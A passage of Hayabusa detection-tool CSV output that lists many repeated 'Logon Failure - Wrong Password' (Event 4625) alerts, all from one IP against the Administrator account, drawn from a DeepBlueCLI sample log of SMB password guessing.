01:51:59.421 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vzDeZtgSJoH74GYk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:59.469 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: iNAFsZraFvw67WWR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:59.533 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0aVdnbyzWqk58rOW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:59.576 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WjUH2PopXCrrPzqi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:59.616 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ylmV2z3WjTWsTpyu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:59.654 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8qBKZTYRTKuEAgS8 | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:59.712 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JvekO4A5f6QK2ynZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:59.753 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LDUqydSeA1guOjIP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:59.796 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: o71TltsJDyOIuLQb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:59.842 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NXT3MSCes42dVCNn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:59.884 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FGXiWeT8Evr6G70M | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:59.924 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: V2RarzrnGgcLaseH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:59.968 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: u3k7dXu9o1vMkhby | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:00.009 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EDBt76dmYnPstFWw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:00.041 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4yjzMC7cw0fe7gjS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:00.080 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: eQOWCM7KP68DZTX9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:00.119 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kn9WWWqCIwfrPbie | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 
01:52:00.156 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AQcamLSzsXOjP6FL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:00.278 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6R6ZMRoYkAPB35Bq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:00.349 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ubqnZm0jmHNFCHrM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:00.419 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7ORQ8vL1oo6CkJXK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:00.473 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rDPl1SSddrWEs979 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:00.585 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VrK7fENAr1lxFr9x | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:00.633 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Wu4djhEVSMYBOmjF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:00.677 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7e0NOdXhEkW6MskA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:00.715 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7nqxLHaOtkHHNAa1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:00.756 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NCrCf73NtEpk5DUR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:00.796 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YVFm1epksVGO1nFY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:00.842 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: YmVehuMHvh5kVqRW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:00.875 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sERZrNUHsKVEShCb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:00.901 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: eaSNgw2hvkxLnQF8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:00.940 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FSYOWptgxHYTDv1x | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:00.984 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Van1qwuRoWYPWrIY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:01.025 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TyLCa9OHocazZKQ2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 
01:52:01.068 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XxrR5iUsTI9LVnLL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:01.110 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TxMREacN0QfvL51B | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:01.156 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7fbzSHaZBDH4zFZZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:01.200 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NgIei0bMIcslJCVa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:01.236 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JPoKjwanczELBC5A | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:01.290 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QOYMVAnCWB2RFYAk | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:01.328 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: k1S45GBtQ8Uoyilw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:01.378 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 60oeDAnU41sz1wYg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:01.424 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: enjlrrdf6lrm7Bao | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:01.465 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 58WzO6wxh7QshZgS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:01.505 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7eZKzHgu5ADLYsWU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:01.548 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: uOSK3xC1E5PpBVNM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:01.598 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vFXasYWGCHbQOWWI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:01.648 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4XlYJ3oHYKYhg0KC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:01.691 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LxOKwi8Q4y2mHBDu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:01.745 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xwFKFySH4w2yWtPX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:01.794 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OlwGTGadOEMfUFiM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 
01:52:01.836 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hZ9WuMoOtxGdwOQn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:01.888 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cCLK0gWvRoz0Ceao | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:01.936 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZDrcOxtm2fHXK5pO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:01.976 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Pm2tPGetcAJkSuvK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:02.016 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FBskiUSfF2ghuDcF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:02.050 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mZJal2nq3JAk6I2S | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:02.093 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Y9ek0Sl1ikhIfIb6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:02.141 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: eHrn5Tp9JtnAgCbE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:02.197 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: k7tR8gp2piqqixqs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:02.245 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SqSBRMoiFeWe4FAt | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:02.297 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Nu4m1xKDU0OUkoR0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:02.354 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: gui98cdQHPgyNOZI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:02.407 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bm4U7TAfsPTEiygC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:02.457 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fDOoaVWVFAMLiA71 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:02.497 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qiJeLgInEkHffefo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:02.547 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yWyguWQP2iYUArhD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:02.595 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vDa3GqsTMMXguFhi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 
01:52:02.645 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Lr0lkAcdnji1zjW4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:02.693 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4WfNFd5MkQxaxHGP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:02.741 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: j8hdPhtxP4Ds65yV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:02.793 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: y2BBoWoXWXuRysTx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:02.884 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6GEhZ2BduHwjJj9H | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:02.927 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GbwEHQCAUJd64LlA | IP Addr: 192.168.198.149 | AuthPackage: 
